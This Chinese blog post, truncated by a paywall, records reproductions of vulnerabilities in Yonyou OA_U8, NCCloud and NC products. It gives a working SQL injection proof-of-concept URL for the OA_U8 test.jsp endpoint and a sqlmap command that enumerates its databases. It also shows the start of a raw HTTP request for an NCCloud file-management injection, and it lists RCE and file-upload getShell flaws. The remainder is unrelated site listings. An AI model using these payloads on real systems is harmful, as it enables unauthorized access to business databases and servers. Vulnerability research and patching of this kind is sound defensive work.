用友OA/NC/NCCloud SQL注入任意文件上传和读取RCE复现渗透测试记录

原创

于 2021-06-23 01:08:40 发布 · 8.2k 阅读

标签

#渗透测试 #数据安全 #信息安全

收录于

本文详细介绍了用友公司多个产品存在的安全漏洞，包括SQL注入、远程命令执行和文件操作漏洞。提供了漏洞复现的POC和利用方式，并给出了相应的sqlmap检测命令。同时，文章强调了非法使用信息的危害，并提出了升级版本和限制访问等修复建议。

简介

用友公司成立于1988年，全面提供具有自主知识产权的企业管理/ERP软件、服务与解决方案，是中国最大的管理软件、ERP软件、集团管理软件、人力资源管理软件、客户关系管理软件及小型企业管理软件提供商。

漏洞情况
用友OA_U8 存在SQL 注入
用友NCCloud FS文件管理 SQL 注入
用友NC bsh.servlet.BshServlet 远程命令执行
用友NC 任意文件上传 getShell

漏洞复现

1.用友 OA_U8 SQL 注入

poc

/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20MD5(1))

如果出现一下指纹则存在sql注入点注入点是 S1

用友sql注入指纹

直接使用SqlMap 进行检测

python sqlmap.py -u url/yyoa/common/js/menu/test.jsp?doType=101&S1=1 --random-agent -p S1 --dbs

2.用友 NCCloud FS文件管理 SQL 注入

poc

GET /fs/console?username=123&password=%2F7Go4Iv2Xqlml0WjkQvrvzX%2FgBopF8XnfWPUk69fZs0%3D HTTP/1.1
Host: xxxxx
Upgrade-Insecure-Requests: 1
Use

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

烽铃子

关注关注

3
点赞
踩
12

收藏

觉得还不错? 一键收藏
2
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

【对架无人机进行规范控制和点对点运动的模拟】可变桨叶四旋翼控制的优化推力分配：翻转动作的比较研究（Matlab代码实现）

06-19

内容概要：本文围绕可变桨叶四旋翼无人机的规范控制与点对点运动模拟展开，重点研究优化推力分配策略在翻转动作中的应用与性能比较。通过Matlab代码实现，构建了四旋翼动力学模型，并设计了多种控制算法以实现精确的姿态调整与轨迹跟踪。研究对比了不同推力分配方案在执行高机动性翻转动作时的稳定性、能耗效率与响应速度，旨在提升无人机在复杂飞行任务中的动态性能与控制精度。该仿真研究为无人机飞控系统的设计与优化提供了理论依据和技术支持。; 适合人群：具备一定自动控制理论基础和Matlab编程能力，从事无人机控制、飞行器动力学或机器人系统研究的科研人员及研究生。; 使用场景及目标：① 实现四旋翼无人机在三维空间中的精确点对点运动控制；② 对比分析不同推力分配策略在执行翻转等高难度动作时的控制效果与能耗表现，优化飞行性能；③ 为无人机自主飞行、特技飞行及复杂环境下的机动控制提供算法验证平台。; 阅读建议：此资源以Matlab仿真为核心，建议读者结合相关控制理论知识，深入理解代码实现细节，重点关注动力学建模、控制律设计与推力分配模块。在学习过程中，应动手调试参数，复现文中翻转动作的仿真结果，并尝试拓展至其他复杂飞行任务，以加深对无人机控制机理的理解。

2 条评论您还未登录，请先登录后发表或查看评论

易语言源码易语言access数据库操作

06-19

易语言源码易语言access数据库操作

C++编程while循环结构测试题解析：程序输出与循环控制逻辑训练

06-19

内容概要：本文档是一份关于C++语言中while循环的专项测试卷，包含20道单项选择题和10道判断题，题目来源于GESP和CSP-J等权威编程等级考试真题。内容涵盖while循环的基本语法、执行逻辑、条件判断、循环控制、常见死循环原因及与其他循环结构的区别，重点考察循环条件的真假判断、循环体执行次数、变量变化过程以及相关逻辑推理能力。附带完整答案解析，有助于巩固C++循环基础知识。; 适合人群：准备参加GESP或CSP-J等青少年编程等级考试的学生，具备初步C++编程基础的学习者（如中小学阶段初学者）；适用于学习流程控制结构中的循环知识点。; 使用场景及目标：①用于检测对while循环掌握程度，查漏补缺；②辅助教师进行教学测评或学生自我练习；③帮助理解循环执行顺序、条件表达式含义及避免死循环等核心概念；阅读建议：建议在完成每道题目后对照答案认真分析错误原因，结合代码调试加深理解；尤其注意条件赋值与比较的区别（如k=0）、逻辑非运算的应用及循环变量更新机制。

06-19

06-19

批量处理图纸乱码方案下载，高效解决大量文件文字异常问题.zip

06-19

彻底解决CAD图纸文字变问号、文字变乱码，以及其他所有字体缺失带来的烦恼

VariCAD 2021安装教程与下载

06-19

VariCAD 2021 VariCAD 2020 VariCAD 2019 VariCAD 2018 VariCAD 2017 以上都包含

景工工艺优化平台解决方案.pptx

06-19

景工工艺优化平台解决方案.pptx

LiteSQL 精简版 MSSQL十大版本合计下载

06-19

LiteSQL 精简版包含版本： LiteSQL2000 精简版 MSSQL2000 LiteSQL2005x86 精简版 MSSQL2005 LiteSQL2005x64 精简版 MSSQL2005 LiteSQL2008X86 精简版 MSSQL2008 LiteSQL2008X64 精简版 MSSQL2008 LiteSQL2025 X64 精简版 MSSQL2025 LiteSQL2022 X64 精简版 MSSQL2022 LiteSQL2019 X64 精简版 MSSQL2019 LiteSQL2017 X64 精简版 MSSQL2017 LiteSQL2016 X64 精简版 MSSQL2016 简介精简版的 MSSQL 数据库，旨在为用户提供一个轻量级且易于使用的数据库解决方案。与原版 MSSQL2000 相比，LiteSQL2000 在保留核心功能的同时，大幅减少了文件体积，解压后仅占用约 100 兆的空间。这使得 LiteSQL2000 成为开发者和数据库管理员在资源有限的环境中进行测试、学习和部署的理想选择。特点体积小巧：解压后仅占用 100 兆空间，方便存储和传输。功能齐全：保留了 MSSQL2000 的核心功能，满足日常数据库操作需求。易于使用：安装简便，配置灵活，适合各种开发和测试环境。适用场景开发测试：适用于开发者在本地或测试环境中进行数据库开发和测试。学习研究：适合数据库初学者和研究人员进行学习和实验。轻量级应用：适用于资源有限的服务器或嵌入式系统中的轻量级应用。使用说明本资源为精简版，可能不包含原版 MSSQL2000 的所有功能和组件。请确保在安装和使用过程中遵循相关许可协议和法律法规。

景观绿化 CAD 图纸乱码？下载绿化行业字体包.rar

06-19

景观绿化 CAD 图纸乱码？下载绿化行业字体包.rar

2026衡农智慧种植平台解决方案.pptx

06-19

2026衡农智慧种植平台解决方案.pptx

手绘转 CAD 图纸乱码？下载识别字体修复包.rar

06-19

解决CAD图纸文字变问号、文字变乱码，欢迎下载！

中医舌诊系统 - 一个基于AI的中医舌诊分析和知识库系统.zip

06-19

多智能体ai中医大师系统，模仿张仲景、张锡纯等经方大师，根据历代名医病案及现代中医医学研究，综合给出中医治疗方案，并严格审核方剂配伍，堪比一小型中医国医大师诊所

通用图纸乱码方案，下载即可解决问题.rar

06-19

解决CAD图纸文字变问号、文字变乱码，欢迎下载！

易语言源码易语言2D鼠标定位源码

06-19

易语言源码易语言2D鼠标定位源码

数据集-供应链风险数据文本分析法（2007-2024年）.txt

06-19

因文件较多，数据存放网盘，txt文件内包含下载链接及提取码，永久有效。失效会第一时间进行补充。样例数据及详细介绍参见文章：https://blog.csdn.net/samLi0620/article/details/162125400

chromedriver-linux64-151.0.7900.0(Canary).zip